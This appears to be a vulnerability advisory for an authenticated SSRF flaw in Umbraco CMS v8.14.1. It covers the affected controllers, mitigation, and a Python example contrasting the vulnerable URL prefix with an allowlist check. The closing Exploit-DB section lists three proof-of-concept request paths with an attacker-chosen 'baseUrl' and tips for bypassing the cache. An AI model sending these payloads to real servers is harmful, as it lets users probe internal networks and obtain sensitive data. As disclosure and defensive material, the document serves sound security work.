Vendor: Umbraco CMS
Author: NgoAnhDuc
CVSS: 8.8 (HIGH)
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Product Name: Umbraco CMS
Affected Version From: v8.14.1
Affected Version To: v8.14.1
Patch Exists: YES
Related CWE:
CPE: a:umbraco:umbraco_cms
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2021

Umbraco v8.14.1 – ‘baseUrl’ SSRF

Umbraco CMS v8.14.1 is vulnerable to Server-Side Request Forgery (SSRF) because the 'baseUrl' query parameter accepted by 'Umbraco.Web.Editors.HelpController.GetContextHelpForPage()', 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent()' and 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss()' is used as the prefix of an outbound HTTP request without any check on the host it names. A request to one of these endpoints with an attacker-chosen 'baseUrl' therefore makes the Umbraco server connect to that host. The three methods live on back-office API controllers, so the attacker needs a valid back-office login, but any such user can reach resources that are only visible from the server, such as services on the local network, and potentially obtain sensitive information from them. The fetched content is cached per 'section' value, which is why the proof of concept changes that parameter on every attempt.

Mitigation:

Upgrade to a release of Umbraco CMS later than v8.14.1 that contains the vendor's fix (v8.14.1 itself is the vulnerable version). Until the upgrade is done, limit back-office accounts to trusted users and restrict outbound connections from the web server to the hosts it legitimately needs to reach.
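The vulnerable pattern described above, next to the host-allowlist check that closes it, as an added Python example. This is not Umbraco's code (the real controllers are C#): the allowlisted host, the remote paths and the candidate 'baseUrl' values are constructed for the example and are not taken from the advisory.

```python
"""Added example, not Umbraco's code: the SSRF shape from the advisory (a
caller-supplied baseUrl used as the prefix of an outbound fetch) beside an
allowlist check that rejects attacker-chosen hosts before any request is made.

Constructed for this example (not from the advisory): ALLOWED_HOSTS, the
remote paths, and the candidate baseUrl values in the demo below.
"""
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist: the only host this server should fetch remote
# back-office content from.
ALLOWED_HOSTS = frozenset({"our.umbraco.com"})


def remote_url_vulnerable(base_url: str, path: str) -> str:
    """Vulnerable shape: the query parameter becomes the start of the URL the
    server fetches, so whoever controls baseUrl controls the destination host."""
    return base_url + path


def canonical_base_url(base_url: str) -> Optional[str]:
    """Hardened shape: accept baseUrl only if it is https, carries no userinfo
    and no explicit port, and names an allowlisted host exactly.
    Returns the canonical 'https://host/' on success, None on rejection.

    Each rejection corresponds to a common allowlist bypass:
      'http://host/' or '//host/'        scheme downgrade / scheme-relative URL
      'https://good.example@evil/'       userinfo: the real host is 'evil'
      'https://good.example.evil/'       suffix match instead of exact match
      'https://good.example:8443/'       port pivot onto another service
    """
    try:
        parts = urlsplit(base_url)
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return None
    if parts.scheme != "https":  # urlsplit already lowercases the scheme
        return None
    if parts.username is not None or parts.password is not None:
        return None
    if port not in (None, 443):
        return None
    host = parts.hostname  # urlsplit lowercases the host for us
    if not host or host not in ALLOWED_HOSTS:
        return None
    # Rebuild from validated parts only; any caller-supplied path, query or
    # fragment in baseUrl is discarded rather than forwarded.
    return f"https://{host}/"


def remote_url_hardened(base_url: str, path: str) -> str:
    """Build the outbound URL from a validated, canonical base or refuse."""
    base = canonical_base_url(base_url)
    if base is None:
        raise ValueError(f"baseUrl rejected by allowlist: {base_url!r}")
    return base + path.lstrip("/")


if __name__ == "__main__":
    # Constructed candidates: one legitimate base and several SSRF attempts.
    candidates = [
        "https://our.umbraco.com/",
        "https://SSRF-HOST.EXAMPLE/",
        "https://our.umbraco.com@SSRF-HOST.EXAMPLE/",
        "https://our.umbraco.com.ssrf-host.example/",
        "http://our.umbraco.com/",
        "https://our.umbraco.com:8443/",
    ]
    for candidate in candidates:
        fetched = remote_url_vulnerable(candidate, "dashboard.json")
        accepted = canonical_base_url(candidate) is not None
        print(f"{candidate:48} vulnerable fetches {fetched}")
        print(f"{'':48} hardened accepts: {accepted}")
```

The stronger fix is to take the remote base URL from server-side configuration and drop the request parameter entirely; the allowlist above is the minimum a practitioner should insist on when the parameter has to stay.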

Exploit-DB raw data:

# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud

Vulnerable code:

Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91

PoC:

/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/

Notes:
- There is no "/" suffix in payload 1
- A "/" suffix is required in payloads 2 and 3
- The "section" parameter value must be changed on each exploit attempt